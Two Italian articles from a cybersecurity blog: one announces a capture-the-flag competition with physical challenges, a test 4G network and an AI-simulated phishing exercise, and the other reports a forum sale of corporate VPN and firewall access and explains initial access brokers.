La sfida si fa sempre più reale di fronte all’operatore nazionale telefonico, una rete 4G radiomobile che andremo a dispiegare presso il teatro italia che dovrà essere violata per conquistare flag fisiche. Ma non sarà solo un gioco di codice e exploit. Per prendere flag fisiche, dovrete anche violare telecamere, reti telefoniche, lucchetti e disinnescare bombe e sfruttare i punti deboli della sicurezza fisica.
- Location per le operazioni cibernetiche standard : Online
- Location per le operazioni cibernetiche in prossimità: Teatro Italia (Secondo Piano)
Quest’anno, gli scenari fisici saranno differenti rispetto alle edizioni precedenti, offrendo nuove sfide e ambientazioni inedite. Per questa edizione, stiamo lavorando su una serie di prove esclusive, progettate per mettere alla prova le capacità dei partecipanti in un contesto realistico e immersivo.
Tutte le sfide saranno disponibili esclusivamente presso il Teatro Italia, che, a differenza dello scorso anno, metterà a disposizione non solo la terza balconata, ma anche l’intera sala al secondo piano per tutta la durata della Capture The Flag. Questo garantirà spazi più ampi rispetto alla scorsa edizione e un’esperienza di gioco ancora più coinvolgente. Alcune delle challenge in prossimità saranno:
- Disinnesca la bomba
- Viola la rete 4G
- Tre metri sopra al cielo
- Accedi alla banca di stato
L’operatore radiomobile 4G di MINZHONG
All’interno degli scenari fisici, quest’anno porteremo una vera rete radiomobile 4G, offrendo un ambiente realistico e avanzato per test di sicurezza sulle telecomunicazioni. I partecipanti avranno l’opportunità di interagire con una infrastruttura di rete, mettendo alla prova le proprie competenze nell’analisi e nell’attacco di sistemi di telecomunicazione in un contesto controllato e altamente tecnico.
L’accesso all’IMS di fonia e a internet sarà una componente chiave di questa esperienza, permettendo ai partecipanti di sperimentare in prima persona le vulnerabilità e le criticità delle reti mobili. L’obiettivo è quello di esplorare i potenziali punti deboli delle reti LTE, comprendere i meccanismi di autenticazione e propagazione del segnale, e individuare eventuali falle di sicurezza che potrebbero essere sfruttate da un attaccante reale.
Porteremo una rete 4G dedicata, fornendo ai partecipanti delle apposite SIM per connettersi al nostro operatore e testare direttamente la sicurezza della rete. Durante la challenge, sarà possibile raccogliere le flag violando la Radio Access Network (RAN) e propagarsi verso la core network e gli elementi di rete. Questo scenario offrirà un’esperienza unica e immersiva, con la possibilità di mettere in pratica tecniche avanzate di attacco e difesa in un ambiente realistico.
Nota Bene: L’irradiazione della rete radiomobile avverrà in prossimità, con un raggio indicativo di circa 7/10 metri, garantendo un’area di sperimentazione sicura e controllata.
Intelligenza artificiale e phishing
All’interno della competizione dovrete anche affinare le vostre abilità di social engineering. Non sempre è necessario un exploit o una vulnerabilità, potrebbe bastare convincere qualcuno a cliccare sul link sbagliato. Avrete infatti la possibilità di hackerare un fornitore di energia nazionale tramite vere e proprie campagne di phishing mirate a rubare dati sensibili per lo svolgimento delle operazioni statali.
A differenza delle altre sfide non dovrete fare affidamento su delle vulnerabilità o mancate configurazioni, bensì vi sarà richiesto di recuperare informazioni e indizi per creare delle mail convincenti. All’interno delle mail potrete includere domande, link o allegati malevoli, ma il risultato finale dipenderà dalle vostre abilità nel rendere la mail credibile. Per recuperare tutte le flag nascoste nell’infrastruttura sarà fondamentale anche la capacità di interpretare le informazioni recuperate dai vari dipendenti, ciascuno con la propria personalità e con i propri dispositivi aziendali.
Questa parte sarà gestita da un sistema automatizzato basato su Intelligenza Artificiale generativa sviluppato dal Centro per la Sicurezza Informatica della Fondazione Bruno Kessler (FBK) di Trento, in collaborazione con l’Università degli Studi di Trento. L’uso dell’IA non si limita solo a rispondere alle mail ricevute, ma alla totalità dell’interazione con il contenuto dei messaggi ricevuti. Tutte le parti dell’infrastruttura saranno create e gestite attraverso un sistema di Infrastructure as a Code (IaaC). Questo sistema sarà reso disponibile tramite un dominio pubblico, in modo da consentire la partecipazione sia ai team fisicamente al Teatro Italia che a quelli remoti. I dati raccolti dalla CTF saranno utilizzati in maniera aggregata e anonima per scopi di ricerca.
Nota bene: Per la durata della competizione sarà messa a disposizione una VPN al fine di rendere possibile l’uso di dispositivi personali come “server malevoli”: ciascun team avrà a disposizione un singolo utente per l’autenticazione.
Il testing della soluzione è stato svolto tra la Fondazione Bruno Kessler (FBK) di Trento e il team di HackerHood di Red Hot Cyber.
Iscrizioni alla Capture The Flag
La CTF avrà inizio con l’accoglienza presso il teatro Italia alle 15:00 dell’8 di Maggio e terminerà orientativamente alle 17:00 del giorno 9 Maggio. Le «Flag Fisiche» questo anno saranno disponibili presso il Teatro Italia per entrambe le giornate.
Tutti i partecipanti dovranno registrarsi all’indirizzo redhotcyber.com/ctf.redhotcybe… (al momento non ancora disponibile) e per accedere al teatro Italia per le flag fisiche, dovranno effettuare la registrazione all’evento dell’8 Maggio su eventbrite: rhc-conference-2025-workshop.e…. Di seguito il programma dell’evento ospitato all’interno della Red Hot Cyber Conference 2025:
- Giovedì 8 Maggio ore 15:00 : Per i partecipanti alle «flag fisiche», Check-in presso il teatro Italia (necessaria la registrazione su Eventbrite)
- Giovedì 8 Maggio ore 15:20 : Check in presso la sala adibita alla Capture the Flag al secondo piano entrando sulla destra (Necessaria la registrazione su CTFD)
- Giovedì 8 Maggio ore 15:30 : Avvio della CTF
- Giovedì 8 Maggio ore 15:30 : Avvio delle «flag fisiche» in collaborazione con CyberSecurityUp e Hackmageddon.world;
- Venerdì 9 maggio ore 17:00 : Chiusura della Capture The Flag
Gli organizzatori dell’evento accoglieranno i team e forniranno informazioni e supporto tecnico-organizzativo. Una chat Discord sarà inoltre disponibile sin dall’avvio della competizione sul sito della CTF per dialogare con gli organizzatori.
Il supporto on-site e on-line sarà attivo dalle 15:30 alle 20:00 del 9 Maggio e dalle 10:00 alle 17:00 del 9 Maggio.
Cosa occorre portare per le flag fisiche
Si raccomanda ai partecipanti che verranno presso il teatro Italia di dotarsi di:
- laptop e cavo di alimentazione (inclusi adattatori se necessari);
- ciabatta multi-presa;
- Prolunga di 5 metri;
- Smartphone connesso ad internet;
- Dongle Bluetooth (se non supportato dal computer portatile);
- Dongle Wi-Fi (se non supportato dal computer portatile);
- Dispositivo NFC;
- SDR solo in modalità RX.
- Smartphone 4G rottato compatibile con VoLTE (consigliata distribuzione lineageos)
I partecipanti sono liberi di utilizzare qualsiasi software o attrezzatura a loro scelta (ad esempio disassemblatori, Kali, macchine virtuali, schede SD, proxmark…) purché non danneggino i target, l’infrastruttura o gli altri partecipanti (vedi sezione Norme di comportamento).
Il Regolamento
Per ulteriori informazioni vi rimandiamo alla lettura del regolamento della capture the flag che trovate a questo indirizzo online
Buona caccia a tutti!
L'articolo La Terza Capture The Flag (CTF) di RHC è Pronta! Tra AI, Reti 4G e Stati Nazionali. Sei pronto? proviene da il blog della sicurezza informatica.
Quale Azienda Italiana Verrà Violata? In Vendita Accessi VPN e firewall aziendali nelle underground
Su BreachForum un utente dallo pseudonimo BoZar45, con un post pubblicato il 6 marzo 2025, proporne in vendita accessi VPN e amministrativi a firewall di aziende, enti governativi e militari. I prezzi variano da 100 a 1000 dollari, la discriminante? la geolocalizzazione e il tipo di accesso che si vuole acquisire.
Lo screenshot pubblicato nel post fa chiaramente riferimento ad un firewall Fortinet 600D.
Aziende in allerta
L’accesso non autorizzato a firewall e VPN aziendali rappresenta una minaccia critica per la sicurezza informatica, poiché consente agli attaccanti di aggirare i meccanismi di protezione perimetrale e accedere direttamente alle risorse interne di un’organizzazione. Una VPN compromessa può permettere ai criminali informatici di muoversi lateralmente all’interno della rete, esfiltrare dati sensibili, distribuire malware o lanciare attacchi ransomware senza essere facilmente rilevati. Nel caso di firewall compromessi, un attaccante con privilegi amministrativi può disattivare le regole di sicurezza, reindirizzare il traffico o creare backdoor persistenti per garantire un accesso continuo alla rete bersaglio.
Questi accessi vengono spesso commercializzati dagli Initial Access Broker (IAB), figure chiave nell’ecosistema del cybercrimine. Gli IAB sono hacker specializzati nell’individuare e vendere punti di ingresso nelle reti aziendali, sfruttando vulnerabilità, credenziali compromesse o exploit zero-day. In molti casi, i loro clienti sono gruppi ransomware, che utilizzano questi accessi per distribuire il proprio malware all’interno delle infrastrutture vittime. Questo modello di business consente una netta separazione tra chi viola le reti e chi esegue gli attacchi finali, rendendo ancora più complessa l’attribuzione degli attacchi e l’interruzione delle attività malevole.
Si tratta di informazioni di prima mano?
È possibile che i dati di accesso in vendita siano un subset di altre liste proposte gratuitamente di recente sempre su BreachForum? Un lavoro di verifica, catalogazione e suddivisione per nazione? Il dubbio sorge spontaneo ricostruendo alcuni post apparsi nell’ultimo periodo su BreachForum, in particolare:
- 26 febbraio 2025: un utente con lo pseudonimo JohnFury ha pubblicato un post intitolato “Black Basta – Leaked Access”. Il file “sottratto” a BlackBasta contiene centinaia di accessi a portali VPN molti dei quali ospitati da firewall Fortinet.
- 14 gennaio 2025: BelsenGroup regala un archivio contenete 15.000 configurazioni di firewall Fortinet e accessi VPN con relative password.
Un altro scenario possibile potrebbe essere quello di una nuova collezione di accessi guadagnati scannerizzando la rete in cerca di target non aggiornati e vulnerabili alle recenti CVE riconosciute e documentate da Fortinet.
Per concludere è importante capire che ruolo giocano gli IAB (Initial Access Broker) nel panorama dell’underground, aprendo le porte a gruppi hacker che poi sfruttano questi accessi per portare a segno attacchi più importanti e potenzialmente devastanti.
L'articolo Quale Azienda Italiana Verrà Violata? In Vendita Accessi VPN e firewall aziendali nelle underground proviene da il blog della sicurezza informatica.